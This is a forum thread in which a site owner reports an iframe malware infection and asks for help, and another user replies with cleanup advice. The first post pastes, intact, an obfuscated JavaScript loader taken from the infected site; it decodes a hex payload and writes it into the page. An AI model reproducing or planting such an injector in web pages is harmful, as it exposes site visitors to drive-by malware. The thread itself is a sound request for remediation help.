re: iframe virus / malware infected our site

[visi]

Hi

It seems our site (on a shared host) has been infected with iframe virus

Lots of our html / php files had iframe code added - pointing to 2 external dodgy looking websites

(I have removed most of the code manually and / or copied over with a clean backup)

At the moment when we try to upload index.htm or index.html
the files are removed immediately from the FTP server so homepage doesn't load! 

Please check out our site:
hxxp://www.visualiminals.com  (HOMEPAGE NOT WORKING as mentioned above)

so please try
hxxp://www.visualiminals.com/products/genius.htm

I also found this script which looks suspicious 

<script>function c3257948b3q49f1af131e067(q49f1af131e44d){ function q49f1af131e835(){var q49f1af131ec1c=16;return q49f1af131ec1c;} return (eval('pa'+'rseInt')(q49f1af131e44d,q49f1af131e835()));}function q49f1af131f005(q49f1af131f3ec){  var q49f1af131f7d8='';q49f1af1320773=String['fromCharCode'];for(q49f1af131fbea=0;q49f1af131fbea<q49f1af131f3ec.length;q49f1af131fbea+=2){ q49f1af131f7d8+=(q49f1af1320773(c3257948b3q49f1af131e067(q49f1af131f3ec.substr(q49f1af131fbea,2))));}return q49f1af131f7d8;} var vf1='';var q49f1af1320b5b='3C7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E696628216D7'+vf1+'96961297'+vf1+'B646F637'+vf1+'56D656E7'+vf1+'42E7'+vf1+'7'+vf1+'7'+vf1+'2697'+vf1+'465287'+vf1+'56E657'+vf1+'363617'+vf1+'065282027'+vf1+'2533632536392536362537'+vf1+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+vf1+'332537'+vf1+'32253633253364253237'+vf1+'2536382537'+vf1+'342537'+vf1+'342537'+vf1+'302533612532662532662537'+vf1+'37'+vf1+'2537'+vf1+'37'+vf1+'2537'+vf1+'37'+vf1+'2532652536322537'+vf1+'322536662536652536662537'+vf1+'342536312536622532652536332536652532662537'+vf1+'302536382537'+vf1+'302536642537'+vf1+'392536312536342536642536392536652532662536392536652536342536352537'+vf1+'382532652537'+vf1+'302536382537'+vf1+'30253366253237'+vf1+'2532622534642536312537'+vf1+'342536382532652537'+vf1+'322536662537'+vf1+'352536652536342532382534642536312537'+vf1+'342536382532652537'+vf1+'32253631253665253634253666253664253238253239253261253331253330253330253332253333253330253239253262253237'+vf1+'253330253333253237'+vf1+'2532302537'+vf1+'37'+vf1+'2536392536342537'+vf1+'34253638253364253337'+vf1+'253337'+vf1+'253331253230253638253635253639253637'+vf1+'2536382537'+vf1+'342533642533312533332533302532302537'+vf1+'332537'+vf1+'342537'+vf1+'39253663253635253364253237'+vf1+'2537'+vf1+'362536392537'+vf1+'332536392536322536392536632536392537'+vf1+'342537'+vf1+'39253361253638253639253634253634253635253665253237'+vf1+'2533652533632532662536392536362537'+vf1+'3225363125366425363525336527'+vf1+'29293B7'+vf1+'D7'+vf1+'6617'+vf1+'2206D7'+vf1+'969613D7'+vf1+'47'+vf1+'27'+vf1+'5653B3C2F7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E';q49f1af132132c=document;q49f1af132132c.write(q49f1af131f005(q49f1af1320b5b));</script>

We used McAfee secure which found 2 possible vulnerabilities:

1) Cross site scripting vulnerability in recommend a friend popup script

2)  website stats script


I have contacted our host already but any tips to remove the threats and secure the site would be great!

Thank you in advance

[DavidR]

I get a 403 permissions error on the home page

No alert on the products/genius.htm page.
I presume you have removed the malicious code from that page ?

Can you modify your post as by copying the script into this page, avast could possibly alert on this page, although it didn't, but it isn't advised to leave it unadulterated.

change the < > characters to ^ ^ or something like that so it can't possibly be interpreted as a script command.

Change your passwords, for uploading, any modification of files and content management software, etc. old versions of PHP can be vulnerable to exploit so you need to ensure that they are fully up to date.